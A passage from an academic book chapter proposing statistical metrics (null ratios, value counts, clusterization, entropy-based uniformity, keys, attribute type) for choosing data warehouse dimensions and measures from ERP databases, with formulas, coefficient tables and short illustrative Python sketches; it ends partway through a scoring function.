3. Expressed in a simplified form of DEDs with only existentially quantified variables (φ′(y), where φ′ is an SWLF predicate and y is a tuple of constants).
4. Expressed in a simplified form of DEDs with only universally quantified variables (∀x [φ(x) → ∨i=1..l φ′i(x)]).
5. It is worth noticing that in our framework the literal datatypes (String, Integer, DateTime, etc.) are considered as classes.
6. www.w3.org/TR/rdf-sparql-query/
7. http://www.w3.org/TR/xpath20/
8. For a detailed analysis of containment, equivalence, and minimization issues in the context of RDF/S query patterns readers are referred to Serfiotis et al. (2005).
9. The predicates triggering the chase step are given in bold while the introduced ones are underlined.
10. To improve paper readability we have eliminated predicates that will not further trigger a constraint.
11. As a matter of a fact we do not replace the view clauses with the mappings (as presented here for simplicity) but we add the mappings.
12. http://virtuoso.openlinksw.com/wiki/main/Main/VOSSQLRDF
13. http://jena.sourceforge.net/SquirrelRDF/
14. http://www.intellidimension.com
15. http://www.wiwiss.fu-berlin.de/suhl/bizer/D2RQ/
This work was previously published in the International Journal on Semantic Web & Information Systems, edited by A. Sheth and M. Lytras, Volume 2, Issue 4, pp. 68-91, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 2.11
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses

Maurizio Pighin, University of Udine, Italy
Lucio Ieronutti, University of Udine, Italy
ABSTRACT

The design and configuration of a data warehouse can be difficult tasks, especially in the case of very large databases and in the presence of redundant information. In particular, the choice of which attributes have to be considered as dimensions and measures can be non-trivial, and it can heavily influence the effectiveness of the final system. In this article, we propose a methodology targeted at supporting the design and at deriving information on the total quality of the final data warehouse. We tested our proposal on three real-world commercial ERP databases.
INTRODUCTION AND MOTIVATION

Information systems allow companies and organizations to collect a large amount of transactional data. Starting from this data, data warehousing provides architectures and tools to derive information at a level of abstraction suitable for supporting decision processes. There are different factors influencing the effectiveness of a data warehouse and the quality of the related decisions. For example, while the selection of good-quality operational data enables one to better target the decision process in the presence of alternative choices (Chengalur-Smith, Ballou, & Pazer, 1999), poor-quality data cause information scrap and rework that waste people, money, materials and facilities resources (Ballou, Wang, Pazer, & Tayi, 1998; English, 1999; Wang & Strong, 1996a, 1996b). We have recently started facing the problem of data quality in data warehouses (Pighin & Ieronutti, 2007); at the beginning of our research, we considered the semantics-based solutions that have been proposed in the literature, and then we moved towards statistical methods, since in a real-world scenario data warehouse engineers typically have a partial knowledge and vision of a specific operational database (e.g., of how an organization really uses the operational system) and of the related semantics, and therefore need support for the selection of the data required to build a data warehouse. We then propose a context-independent methodology that is able both to support the expert during the data warehouse creation and to evaluate the final quality of the design choices taken. The proposed solution is mainly focused on statistical and syntactical aspects of data rather than on semantics, and it is based on a set of metrics, each one designed with the aim of capturing a particular data feature. However, since most design choices are based on semantic considerations, our goal is to propose a solution that can be coupled with semantics-based techniques (for instance the one proposed by Golfarelli, Maio, and Rizzi (1998)) to effectively drive design choices. In particular, our methodology results effective in the following situations:
• During the construction phase, it is able to drive the selection of an attribute in the case of multiple choices (i.e., redundant information); for example, when an attribute belongs to different tables of a given database or to different databases (the typical scenario in this kind of application). Additionally, it is able to evaluate the quality of each choice (i.e., the informative value added to the final data warehouse by choosing a table and its attribute as a measure or dimension).
• At the end of the data warehouse design, it measures in quantitative terms the final quality of the data warehouse. Moreover, in the case of data warehouses based on the same design choices (characterized by the same schema), our methodology is also able to evaluate how the data actually stored in the initial database influences the informative content of the resulting data warehouse.

To evaluate the effectiveness of our methodology in identifying attributes that are more suitable to be used as dimensions and measures, we have experimented the proposed metrics on three real commercial ERP (Enterprise Resource Planning) systems. Two systems are based on an Informix DB running on a Unix server, and one is based on an Oracle DB running on a Windows server. In the experiment, they are called DB01, DB02 and DB03, respectively. More specifically, our metrics have been tested on the data collected by the selling subsystems. In this article, we refer to measures and dimensions in relation to the data warehouse, and to metrics as the indexes defined in the methodology we propose for evaluating data quality and reliability. Moreover, we use DW and DB to identify a decisional data warehouse and an operational database, respectively.

RELATED WORK
In the literature, different researchers have focused on data quality in operational systems, and a number of different definitions and methodologies have been proposed, each one characterized by different quality metrics. Although Wang (1996a) and Redman (1996) proposed a large number of metrics that have become the reference models for data quality in operational systems, in the literature most works refer only to a limited subset (e.g., accuracy, completeness, consistency and timeliness).
Literature reviews (e.g., Wang, Storey, & Firth, 1995) highlighted that there is not a general agreement on data quality metrics; for example, timeliness has been defined by some researchers in terms of whether the data are out of date (Ballou & Pazer, 1985), while other researchers use the same term for identifying the availability of output on time (Karr, Sanil, & Banks, 2006; Kriebel, 1978; Scannapieco, Virgillito, Marchetti, Mecella, & Baldoni, 2004). Moreover, some of the proposed metrics, called subjective metrics (Wang & Strong, 1996a), require an evaluation made by questionnaires and/or interviews, and therefore result more suitable for qualitative evaluations than for quantitative ones. Jeusfeld, Quix, and Jarke (1998) adopt a metamodeling approach for linking quality measurements to different abstraction levels and user requirements, and propose a notation to formulate quality goals, queries and measurements. Some researchers have focused on automatic methods for conceptual schema development and evaluation. Some of these approaches (e.g., Phipps & Davis, 2002) include the possibility of using user input to refine the obtained result. However, these solutions typically require translating user requirements into a formal and complete description of a logical schema. An alternative category of approaches employs statistical techniques for assessing data quality. For example, analyzing the statistical distributions of data can provide useful information on data quality. In this context, an interesting work has been presented in Karr et al. (2006), where a statistical approach has been experimented on two real databases; their work provided us with interesting cues and gave a strong motivation for our research. A different category of techniques for assessing data quality concerns Cooperative Information Systems (CISs). In this context, the DaQuinCIS project proposed a methodology (Scannapieco et al., 2004) for quality measurement and improvement. The proposed solution is primarily based
on the premise that CISs are characterized by high data replication (i.e., different copies of the same data are stored by different organizations). From the data quality perspective, this feature offers the opportunity of evaluating and improving data quality on the basis of comparisons among different copies. Data redundancy has been effectively used not only for identifying mistakes, but also for reconciling the available copies or selecting the most appropriate ones. With respect to operational systems, additional factors influence the effectiveness of data warehouses and the quality of the related decisions. For example, while in the context of operational systems the quality of data mainly depends on the design and production processes generating and integrating data, in data warehouses the choice of which attributes have to be considered as measures and which as dimensions heavily influences the data warehouse effectiveness.

PROPOSED INDEXES

In this section, we describe the set of indexes we propose for evaluating how much an attribute of a given DB is suitable to be used for correctly building a DW. Considering the whole set of definitions and metrics that have been proposed in the literature for assessing the data quality of an operational DB, we identified the concepts of relevance and value-added proposed by Wang (1996a) as the most appropriate ones for our analysis. Indeed, we are interested in identifying the set of attributes of a given DB that store relevant information and that could add value to decision processes. For this purpose, we identified a set of indexes referring to the following two types of DB entities:
PROPOSED INDEXES In this Section, we describe the set of indexes we propose for evaluating how much an attribute of a given DB is suitable to be used for correctly building a DW. Considering the whole set of definitions and metrics that have been proposed in the literature for assessing data quality of an operational DB, we identified the concepts relevance and valueadded proposed by Wang (1996a) as the most appropriate ones for our analysis. Indeed, we are interested in identifying the set of attributes of a given DB storing relevant information and that could add value in decision processes. For such purpose, we identified a set of indexes referring to the following two types of DB entities: •
Tables of a DB: At a general level, we define a set of metrics highlighting which tables of a given DB could contain more/less relevant data.
617
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
•
Attributes of a table: At a level of a single table, we define a set of metrics that help users in identifying which attributes of a given table would be more relevant for data analysis purposes.
All the proposed indexes are normalized into the interval [0, 1], where 0 indicates that the set of data belonging to the considered entity (attribute or table) does not provide added value from the data analysis point of view, while 1 indicates that it can play a fundamental role in supporting decision processes. In the following sections, we separately present the indexes referring to the above types of entities.

Indexes for Tables

In this section, we describe the set of metrics Me (e = 1, ..., k) and the corresponding indexes we propose for DB tables. With these metrics, we aim at taking into account that different tables can play different roles and can therefore be more or less suitable for extracting measures and dimensions. The global indicators Sm,j and Sd,j, measuring how much the table tj is suitable for extracting measures and dimensions, are derived by combining the indexes computed by the metrics Me (e = 1, ..., k) using the coefficients Cm,e and Cd,e, respectively. These global indicators are used (i) to support the selection of the tables for the DW construction, and (ii) to differently weight the indexes computed on the attributes belonging to different tables. In particular, the two indexes Sm,j and Sd,j are derived as described in Formula 1:

Sp,j = ( Σe=1..k Cp,e * Me(tj) ) / k    (1)

where: (i) p = d or m (d = dimension, m = measure); (ii) e = 1, ..., k identifies the metric; (iii) j = 1, ..., q identifies the table; (iv) Cp,e is the coefficient of the table-metric e.

In the following, we first introduce two elementary functions, and then we describe the metrics we propose for DB tables and the corresponding coefficients:

• cRec(tj): counts the number of records actually stored in the table tj.
• cAttr(tj): counts the number of attributes of the table tj.
Percentage of Records

This metric measures the percentage of records stored in the considered table with respect to the total number of DB records (or of the considered subset), using the function cRec(tj). It is important to note that, in the original DB, different tables can store data referring to different time intervals (typically, the most recent transactional data). For example, in a real DB old transactional data are generally either deleted or moved into other secondary tables. Then, to correctly compare the number of records stored in different tables, a first normalization based on temporal intervals is useful (TNORM). More specifically, if a table does not store transactional data (e.g., it stores information on customers and/or suppliers), the number of records considered for this metric corresponds to the number of records actually stored in the table. On the other hand, the time normalization is required if the table stores information related to transactional activities; in such a case, our methodology asks the designer to specify the temporal attribute of the table, related to transactional activities, on which the TNORM function is applied. With q the total number of tables, the final index for the table tj is computed as described in Formula 2:

M1(tj) = TNORM(cRec(tj)) / Σj=1..q TNORM(cRec(tj))    (2)
If the analysis concerns the identification of the tables that are more suitable to extract measures, the corresponding coefficient is positive (Cm,1 > 0), since tables storing transactional and operational information are generally characterized by a higher number of records with respect to the other tables. On the other hand, the coefficient for dimensions is negative (Cd,1 < 0) since, for example, tables pertaining to business object definitions (e.g., products and clients) are typically characterized by a lower number of records than transactional archives. Figure 1 shows the percentage of records for the tables of the three real commercial DBs of the experiment. It is interesting to note that the distribution of records across the different tables is similar in the considered DBs; most tables (about 80%) store a limited percentage of records (less than 5%), while only few tables (less than 5%) are characterized by a large number of records. In other words, there are several tables contributing positively to the quality of the attributes from the dimensions point of view, while from the measures point of view the number of tables is more limited.
Percentage of Attributes

This metric measures the percentage of attributes belonging to the considered table with respect to the total number of DB attributes. The index for this metric is computed as described in Formula 3:

M2(tj) = cAttr(tj) / Σj=1..q cAttr(tj)    (3)
The coefficient for this metric is positive for measures (Cm,2 > 0) since, for example, tables storing information on business objects are typically characterized by a high number of attributes. A negative coefficient is used in the case of dimensions (Cd,2 < 0) because tables storing information concerning transactional activities are generally characterized by a lower number of attributes.
Figure 1. Percentage of records stored into different tables
Figure 2. Percentage of attributes stored into different tables
Figure 2 shows the percentage of attributes for the same tables of the experiment; one can easily note that the attributes are more evenly distributed across the DB tables than the records are.
List of Coefficients for Table-Metrics

Table 1 summarizes the set of coefficients we have employed for evaluating the DB tables. By changing the coefficient of a given metric, one can modify the weight of the corresponding index. In our experiment, the absolute value of all coefficients belongs to the interval [0, 1]; when the coefficient of a given metric is close to 0, the corresponding index (independently from its value) barely influences the indicators Sm,j and Sd,j of the table tj. On the other extreme, metrics characterized by coefficients that are close to 1 heavily influence these indicators. Since the percentage of records stored in a table is a more relevant feature than the percentage of attributes characterizing the table, in our experiment the coefficient of the second metric is smaller than the one assigned to the first metric. In particular, while the coefficient for M1 equals 1, the one for M2 equals 0.5 (the sign of the coefficient depends on the role considered for the analysis, i.e., the dimensions or measures point of view).

Table 1. List of coefficients for table-metrics

                                   Cd     Cm
M1 - Percentage of records         -1     1
M2 - Percentage of attributes      -0.5   0.5
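As an illustration only (using the coefficients of Table 1 and assuming that the metric values M1 and M2 have already been computed for a table), the global indicators of Formula 1 could be obtained as follows:

COEFFS = {                     # (Cd, Cm) per table-metric, as listed in Table 1
    "M1": (-1.0, 1.0),
    "M2": (-0.5, 0.5),
}

def table_indicators(metric_values):
    """metric_values: e.g. {"M1": 0.25, "M2": 0.10} for one table t_j."""
    k = len(metric_values)
    s_d = sum(COEFFS[m][0] * v for m, v in metric_values.items()) / k
    s_m = sum(COEFFS[m][1] * v for m, v in metric_values.items()) / k
    return s_d, s_m

# A table holding 25% of the (time-normalized) records and 10% of the attributes:
print(table_indicators({"M1": 0.25, "M2": 0.10}))   # (Sd, Sm) = (-0.15, 0.15)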
Indexes for Attributes

In this section, we describe the set of metrics mh (h = 1, ..., r) and the corresponding indexes we propose for DB attributes. The aim of these metrics is to highlight different properties and features of the data. The global indicators sd,i and sm,i, measuring how much the attribute ai is suitable to be used as a dimension and as a measure respectively, are derived by differently combining the indexes computed by the metrics mh (h = 1, ..., r) using the coefficients cd,h and cm,h, respectively. In particular, the two indexes sd,i and sm,i are derived as described in Formula 4:

sp,i = ( Σh=1..r cp,h * mh(ai) ) / r    (4)

where: (i) p = d or m (d = dimension, m = measure); (ii) h = 1, ..., r identifies the metric; (iii) i identifies the attribute; (iv) cp,h is the coefficient of the attribute-metric h considering the role p of the attribute. In the case of a DW attribute derived as a combination of more than one DB attribute, the corresponding index is derived as the mean of the indexes related to the DB attributes.

In the following, we first introduce a set of definitions and elementary functions, and then we describe the proposed metrics and the corresponding coefficients:

• cNull(ai): counts the number of null values of the given attribute ai.
• cValue(ai, v): counts the number of occurrences of the value v in the given attribute ai (more generally, the number of instances of a given value in an array).
• cValues(ai): counts the number of different values of the considered attribute ai.
• inst(ai, nIntervals): returns an array of nIntervals integer values. In particular, it first subdivides the domain into nIntervals intervals and then, for each interval, it counts the number of data values falling into the corresponding range of values.
• Pkey(tj): identifies the set of attributes belonging to the primary key of the table tj.
• cPkey(tj): counts the number of attributes constituting the primary key of the table tj.
• cPkey(tj, ai): returns 1/cPkey(tj) if the attribute ai belongs to Pkey(tj), 0 otherwise.
• Dkey(tj): identifies the set of duplicable keys of the table tj.
• cDkey(tj): counts the total number of attributes belonging to duplicable keys of the table tj.
• cDkey(tj, ai): counts the total number of instances of the attribute ai in Dkey(tj) (the same attribute can belong to more than one duplicable key).
Percentage of Null Values

Given the attribute ai belonging to the table tj, this metric measures the percentage of data having null values, as described in Formula 5:

m1(ai) = cNull(ai) / cRec(tj),   ai ∈ tj    (5)
Although simple, this metric provides an important indicator concerning the relevance of an attribute since, independently from its role, attributes characterized by a high percentage of null values are not suitable to effectively support decision processes. For example, an attribute having a percentage of null values greater than 90% is characterized by a scarce informative content from the analysis point of view. For this reason, both coefficients for this metric are negative (cm,1 and cd,1 < 0), highlighting that the presence of an high number of null values is an undesirable feature for both dimensions and measures. Concerning the order in which different metrics are applied, it is important to note that the percentage of null values is the first-computed index and the computation of the other indexes is constrained to the value provided by this metric. Indeed, the other indexes are computed only if the percentage of null values is below a given threshold (e.g., in our experiments = 95%).
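As a minimal illustration (table and column names are purely hypothetical), the m1 index of Formula 5 boils down to a pair of counts:

import sqlite3

def null_ratio(conn, table, column):
    # m1 = cNull(ai) / cRec(tj): share of null values of the attribute.
    total = conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
    nulls = conn.execute(f"SELECT COUNT(*) FROM {table} WHERE {column} IS NULL").fetchone()[0]
    return nulls / total if total else 0.0

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE SalesLine (Product TEXT, Quantity REAL, Discount REAL)")
conn.executemany("INSERT INTO SalesLine VALUES (?,?,?)",
                 [("A01", 3, 0.1), ("A02", 1, None), ("A03", 2, None), ("A04", 5, 0.0)])
print(null_ratio(conn, "SalesLine", "Discount"))   # 0.5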
Experimenting our methodology on real commercial databases, we have measured a percentage of null values that is considerably higher than expected. For example, the overall percentage of null values for the databases considered in the experimental evaluation reported in the Experimental Evaluation section are 41,36%, 42,62% and 51,53%, respectively, for the first, second, and third DB. Figure 3 shows the ranked indexes (increasing order) computed for the attributes belonging to the considered DBs. It is interesting to note that the three DBs show similar distributions of null values; about one third of the attributes do not contain null values, another one third stores only null values, and the remaining one third of attributes is characterized by different (linearly distributed) percentages of null values.
Figure 3. Percentage of null values for the attributes

Number of Values

Given the attribute ai belonging to the table tj, the index computed by this metric concerns the extent to which the attribute assumes different values on the domain. In particular, the metric returns an index that is close to 1 in two different (and opposite) cases: (i) the attribute assumes a limited number of different values, or (ii) it assumes a wide range of different values. Values ranging from 0 to 1 are computed for intermediate situations. The index for this metric is computed as described in Formula 6 (Box 1):

m2(ai) = 0, if m1(ai) > threshold or (cRec(tj) − cNull(ai)) < 2
m2(ai) = 1, if (cRec(tj) − cNull(ai)) = 2
m2(ai) = ( cos( 2π · (cValues(ai) − 2) / (cRec(tj) − cNull(ai) − 2) ) + 1 ) / 2, otherwise    (6)

If the percentage of null values is above the chosen threshold, or if the domain is represented by a single value, the index equals 0. On the other extreme, the index equals 1 when the attribute is characterized by only two different values. In the other cases, this metric behaves like the cosine function. As a result, if an attribute assumes a small number of different values (e.g., in the case of units of measurement, where only a limited number of different values is admitted), this metric derives a value that is close to 1. A similar value is derived when an attribute is the primary key of a large table, since in this case the number of different values equals the total number of records stored in the table. If the analysis concerns the evaluation of how much an attribute is suitable to be used as a dimension, the corresponding coefficient is positive (cd,2 > 0), since both attributes assuming a limited number of different values and attributes characterized by a large number of different values can be effectively used for exploring the data. For example, an attribute storing information on the payment type (e.g., cash money or credit card) is suitable to be used as a dimension and is typically characterized by a limited number of different values. On the other extreme, an attribute storing product or customer codes is also suitable to be used as a dimension and is typically characterized by a high number of different values. With respect to the choice of measures, the coefficient is negative (cm,2 < 0) because attributes characterized by (i) a few values are generally not suitable to be used as measures, since they do not contain discriminatory and predictive information, and (ii) a large number of different values can correspond to keys and therefore be unsuitable as measures. On the other hand, attributes storing information related to transactional activities (and thus suitable to be used as measures) are characterized by a number of different values (e.g., purchase amounts or numbers of items sold) that is lower than the total number of records. Figure 4 shows the ranked indexes (increasing order) computed for the attributes belonging to the three different commercial DBs of the experiment. Also in this case, it is interesting to note that the computed indexes exhibit similar distributions.
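A small sketch of the m2 index follows; it assumes the cosine argument spans a full period (2π), as in the reconstruction of Formula 6 above, and takes the whole column (nulls included) as a Python list:

import math

def m2(values, m1_index, threshold=0.95):
    not_null = [v for v in values if v is not None]       # cRec - cNull values
    if m1_index > threshold or len(not_null) < 2:
        return 0.0
    if len(not_null) == 2:
        return 1.0
    distinct = len(set(not_null))                         # cValues(ai)
    ratio = (distinct - 2) / (len(not_null) - 2)          # 0 (few values) .. 1 (all distinct)
    return (math.cos(2 * math.pi * ratio) + 1) / 2        # close to 1 at both extremes

print(m2([1, 1, 1, 1, 2, 2, None], m1_index=0.14))   # only two distinct values -> 1.0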
Degree of Clusterization

Given the attribute ai belonging to the table tj, this metric measures the extent to which the attribute assumes similar values on the domain. The index for this metric is computed as described in Formula 7 (Box 2).
This metric works as follows. First, using the inst(ai, sqrt(cRec(tj) − cNull(ai))) function, it discretizes the domain of ai by equally subdividing it into a number of intervals equal to the square root of the number of not-null values of ai. As a result, the larger the number of not-null values, the larger the number of intervals used for the discretization. With respect to the choice of having a number of intervals linearly proportional to the number of values, the square root function allows one to reduce the complexity of the computation in the case of a huge number of records (which is the typical scenario for attributes belonging to tables that store information on transactional activities). Then, the index is derived by counting the number of intervals having at least one value falling in them. If there are several empty intervals, this means that the data are clustered on the domain, and then the computed index is close to 1. On the other hand, if the values are spread over the domain, it is probable that most intervals have at least one value falling in them; in this case, the computed index is close to 0. It is important to highlight that this metric does not consider the distribution of values across the different intervals, but only the number of empty intervals. If the analysis concerns the evaluation of how much an attribute is suitable to be used as a dimension, the corresponding coefficient is positive (cd,3 > 0), since typically attributes that are suitable to be used as dimensions (e.g., numerical codes and names of products, customers and suppliers) are clusterizable. On the other hand, the coefficient for measures is negative (cm,3 < 0), since attributes suitable to be used as measures are generally characterized by values that tend to spread over the domain. Figure 5 shows the ranked indexes (increasing order) computed for the attributes belonging to the three considered commercial DBs.
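Since Box 2 (Formula 7) is not reproduced above, the following is only a behavioural sketch of the description just given — the share of empty intervals after a sqrt-sized discretization of the domain; any normalization detail of the actual formula is an assumption:

import math

def m3(values):
    not_null = sorted(v for v in values if v is not None)
    if len(not_null) < 2:
        return 0.0
    n_intervals = max(1, int(math.sqrt(len(not_null))))
    lo, hi = not_null[0], not_null[-1]
    width = (hi - lo) / n_intervals or 1.0                 # guard against a constant attribute
    occupied = {min(int((v - lo) / width), n_intervals - 1) for v in not_null}
    return 1.0 - len(occupied) / n_intervals               # share of empty intervals

print(m3([1] * 8 + [100] * 8))   # two clusters at the extremes -> half the intervals are empty (0.5)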
Uniformity of Distribution This metric measures how much the values of an attribute are equally distributed on the domain. More specifically, this metric use the general meaning of entropy for characterizing the distribution of data of a given attribute. With this metric
623
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Figure 5. Degree of clusterization for the attributes
we aim at automatically distinguishing a uniform distribution from other types of distribution. The concept of entropy is used in a wide range of application domains: in physics, entropy quantifies the amount of disorder of a system, while in information theory it relates to the amount of uncertainty about an event associated with a given probability distribution. In this context, Shannon defines the entropy of a discrete random event x, characterized by a set of possible states i = 1...n, as described in Formula 8:

H(x) = \sum_{i=1}^{n} p(i) \log_2\!\left(\frac{1}{p(i)}\right) = -\sum_{i=1}^{n} p(i) \log_2 p(i) \qquad (8)

where p(i) indicates the probability of state i. We use this notion of entropy to characterize the distribution of the values of a given attribute. In particular, the index m4(ai) for the attribute ai is computed as follows. First, similarly to the previous metric, this one uses the inst(ai, sqrt(cRec(tj)-cNull(ai))) function to discretize the domain of ai and count the number of values falling into the different intervals. The metric then normalizes these counts, deriving for each interval the value p(k) corresponding to the percentage of values falling into the kth interval. The index is then obtained by applying the above definition of entropy and normalizing the computed value, where the term -log2(1/nIntervals) is used for normalization (the maximum entropy is obtained in the case of a uniform distribution). As a result, the index measuring the uniformity of distribution is computed as described in Formula 9 (see Box 3).

Box 3.

m_4(a_i) = \dfrac{-\sum_{k=1}^{nIntervals} \dfrac{inst(a_i, nIntervals)[k]}{\sum_{t=1}^{nIntervals} inst(a_i, nIntervals)[t]} \log_2 \dfrac{inst(a_i, nIntervals)[k]}{\sum_{t=1}^{nIntervals} inst(a_i, nIntervals)[t]}}{-\log_2 \dfrac{1}{nIntervals}}, \qquad nIntervals = \sqrt{cRec(t_j) - cNull(a_i)} \qquad (9)

The possibility of highlighting uniform distributions enables our methodology to effectively evaluate attributes that are suitable to be used
as measures, since these attributes are typically characterized by other types of distribution (e.g., a normal distribution). For example, the distribution of values of an attribute storing customer information is more likely to resemble a uniform distribution than the distribution of values of an attribute storing billing information (typically characterized by a Gaussian distribution). For this reason, if the analysis concerns the evaluation of how suitable an attribute is to be used as a measure, the corresponding coefficient is negative (cm,4 < 0), since the attributes suitable to be used as measures are generally characterized by values that are not equally distributed on the domain. On the other hand, if the analysis concerns dimensions, the corresponding coefficient is positive (cd,4 > 0), since the more uniformly the values are distributed on the domain (or in the considered subset), the more effectively the analyst can explore the data. Figure 6 shows the ranked indexes (increasing order) computed for the attributes belonging to the three commercial DBs. It is important to highlight the difference between this metric and the previous one: although both are based on the same domain discretization, the uniformity of distribution considers how many values fall into each interval, whereas the degree of clusterization takes into account only the number of intervals that have at least one value falling in them. As a
result, while this metric provides information on the distribution of values, the previous one indicates whether the values stored in the attribute can be clustered.
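Formula 9 translates almost directly into code: the per-interval counts play the role of inst(ai, nIntervals)[k], and the entropy is normalized by -log2(1/nIntervals) so that a perfectly uniform distribution scores 1. The sketch below assumes the interval counts have already been computed; names are illustrative.

```python
import math

def uniformity_of_distribution(interval_counts):
    """Sketch of m4 (Formula 9): entropy of the per-interval frequencies,
    normalized by log2(nIntervals) so that a uniform distribution scores 1."""
    n_intervals = len(interval_counts)
    total = sum(interval_counts)
    if n_intervals < 2 or total == 0:
        return 0.0
    entropy = 0.0
    for count in interval_counts:
        if count > 0:
            p_k = count / total            # p(k): share of values in interval k
            entropy -= p_k * math.log2(p_k)
    return entropy / math.log2(n_intervals)  # -log2(1/nIntervals) normalization

# Example: a uniform histogram scores 1.0, a concentrated one well below 1.
print(uniformity_of_distribution([5, 5, 5, 5]))   # 1.0
print(uniformity_of_distribution([17, 1, 1, 1]))  # roughly 0.42
```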
Keys
This metric derives a value by taking into account both whether the considered attribute belongs to primary and/or duplicable keys and the total number of attributes constituting those keys. The primary key of a given table tj can either correspond to a single attribute (in this case, cPkey(tj) = 1) or be composed of a set of attributes (cPkey(tj) > 1). Moreover, it is important to note that in a given table tj (i) more than one duplicable key can exist, each one (potentially) characterized by a different number of attributes, and (ii) an attribute can belong to more than one duplicable key (in this case, cDkey(tj, ai) > 1). For combining the information on primary and duplicable keys, we introduce the additional parameter w∈[0, 1]; more specifically, w is used for weighting differently the attributes belonging to the primary key and those belonging to secondary keys. In our experiments, we assign the same weight to primary and secondary keys (i.e., w = 0.5). Given the attribute ai belonging to the table tj, the index for this metric is computed as described in Formula 10.
Figure 6. Uniformity of distribution for the attributes
At one extreme, if ai is the primary key of the table tj and the table does not contain duplicable keys, the index for ai equals 1, while the indexes for all the other attributes equal 0. The coefficient for dimensions is positive (cd,5 > 0), since attributes belonging to primary or secondary keys often identify look-up tables and are therefore the best candidates for dimensions in a DW. On the other hand, the coefficient for measures is negative (cm,5 < 0), since attributes belonging to primary or secondary keys are typically not suitable to be used as measures. Figure 7 shows the ranked indexes (increasing order) computed for the attributes belonging to the three commercial DBs.
Type of Attribute
This metric returns a float value according to the type of the attribute. More specifically, the index for this metric is derived as described in Formula 11 (see Box 5). Numerical attributes are typically more suitable to be used as measures than as dimensions; for this reason, the coefficient for measures is positive (cm,6 > 0). On the other hand, in the case of dimensions, the corresponding coefficient is negative (cd,6 < 0), since business object definitions are often coded by alphanumerical attributes. Moreover, alphanumerical attributes are rarely used in a DW as measures due to the limited number of applicable mathematical functions (e.g., the count function).
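Since Formula 11 (Box 5) is a simple piecewise mapping from the attribute's data type to a score, it can be rendered directly in code; the string labels used to classify the type below are an assumption of this sketch, not part of the proposal.

```python
def type_of_attribute_index(attribute_type):
    """m6 (Formula 11): 0 for booleans/strings, 0.5 for whole numbers,
    1 for decimal values; the attribute_type labels are illustrative."""
    if attribute_type in ("boolean", "string"):
        return 0.0
    if attribute_type == "integer":
        return 0.5
    if attribute_type == "decimal":
        return 1.0
    raise ValueError(f"unknown attribute type: {attribute_type}")
```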
List of Coefficients for Attribute-Metrics
Although the coefficients can take arbitrary values, we assign unit values to them (i.e., -1 or +1); as a result, in our experiments we have equally weighted the indexes computed by our metrics for deriving the global indexes sd and sm. However, in future work we intend to investigate whether an accurate tuning of the coefficients may lead to more effective results. Table 2 summarizes the set of coefficients we have employed for the attributes.
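Assuming the six attribute-metric indexes are combined into sd and sm as coefficient-weighted sums (the aggregation itself is defined earlier in the methodology and is only implied here by the role of the coefficients), a minimal sketch with Table 2's unit coefficients could look as follows; names are illustrative.

```python
# Unit coefficients from Table 2: (cd, cm) per attribute-metric m1..m6.
COEFFICIENTS = {
    "m1_null_values":      (-1, -1),
    "m2_number_of_values": ( 1, -1),
    "m3_clusterization":   ( 1, -1),
    "m4_uniformity":       ( 1, -1),
    "m5_keys":             ( 1, -1),
    "m6_type":             (-1,  1),
}

def attribute_scores(metric_values, coefficients=COEFFICIENTS):
    """Sketch: combine the six metric indexes of one attribute into the
    dimension score sd and the measure score sm as coefficient-weighted
    sums (assumed aggregation; metric_values maps metric name -> index)."""
    s_d = sum(coefficients[name][0] * value for name, value in metric_values.items())
    s_m = sum(coefficients[name][1] * value for name, value in metric_values.items())
    return s_d, s_m
```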
DW-QUALITY METRIC
Our methodology characterizes each attribute with a pair of global indexes Gm,i,j and Gd,i,j indicating how suitable the attribute ai belonging to the table tj is to be used as a measure and as a dimension, respectively. These indexes are computed as described in Formula 12:

G_{p,i,j} = S_{p,j} \cdot s_{p,i}, \qquad a_i \in t_j \qquad (12)
Figure 7. Keys for the attributes
Box 5.

m_6(a_i) = \begin{cases} 0 & \text{if } a_i \text{ stores boolean values or alphanumerical strings of various type} \\ 0.5 & \text{if } a_i \text{ stores whole numbers of various type} \\ 1 & \text{if } a_i \text{ stores decimal values of various type} \end{cases} \qquad (11)

Table 2. List of coefficients for attribute-metrics

Attribute-metric | cd | cm
m1 - Percentage of null values | -1 | -1
m2 - Number of values | 1 | -1
m3 - Degree of clusterization | 1 | -1
m4 - Uniformity of distribution | 1 | -1
m5 - Keys | 1 | -1
m6 - Type of attribute | -1 | 1
where: (i) p = d or m (d = dimension, m = measure); (ii) i identifies the attribute; (iii) j identifies the table; (iv) Sp,j corresponds to a table-metric index; and (v) sp,i corresponds to an attribute-metric index. Once all these indexes are computed, our methodology derives two lists of attributes: the first contains all DB attributes ordered according to Gd, while the second is ordered according to Gm. We then define rankd(ai) as the function deriving the relative position of ai in the first (ordered) list, and rankm(ai) as the function deriving the position of ai in the second list. We use these ranking functions to evaluate
the effectiveness of our methodology in correctly identifying the set of attributes that are most suitable for the DW construction (see the section titled Experimental Evaluation–Attribute Indexes). The global index I(DW) measuring the total quality of the final DW is derived using the above indexes. More specifically, with Ad being the set of nd attributes chosen as dimensions and Am the set of nm attributes to be used as measures, the index measuring the total DW quality is computed as described in Formula 13:
I(DW) = \dfrac{\sum_{a_i \in A_m,\, a_i \in t_j} G_{m,i,j} + \sum_{a_i \in A_d,\, a_i \in t_j} G_{d,i,j}}{n_d + n_m} \qquad (13)
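Formulas 12 and 13, together with the ranking functions, can be sketched in a few lines of Python: each global index is the product of a table-metric index and an attribute-metric index, the rankings are obtained by sorting on those values (0 for the best candidate, 1 for the worst), and I(DW) averages the global indexes of the attributes actually chosen as measures and dimensions. The data structures and names below are assumptions of this sketch.

```python
def global_index(table_index, attribute_index):
    """Formula 12: G_{p,i,j} = S_{p,j} * s_{p,i}, for p in {d, m}."""
    return table_index * attribute_index

def rank_positions(global_scores):
    """Relative rank in [0, 1]: 0 for the best candidate, 1 for the worst.
    global_scores maps (table, attribute) -> G value."""
    ordered = sorted(global_scores, key=global_scores.get, reverse=True)
    last = max(len(ordered) - 1, 1)
    return {attr: pos / last for pos, attr in enumerate(ordered)}

def dw_quality(G_m, G_d, measures, dimensions):
    """Formula 13: I(DW) = (sum of G_m over chosen measures +
    sum of G_d over chosen dimensions) / (n_d + n_m)."""
    total = sum(G_m[a] for a in measures) + sum(G_d[a] for a in dimensions)
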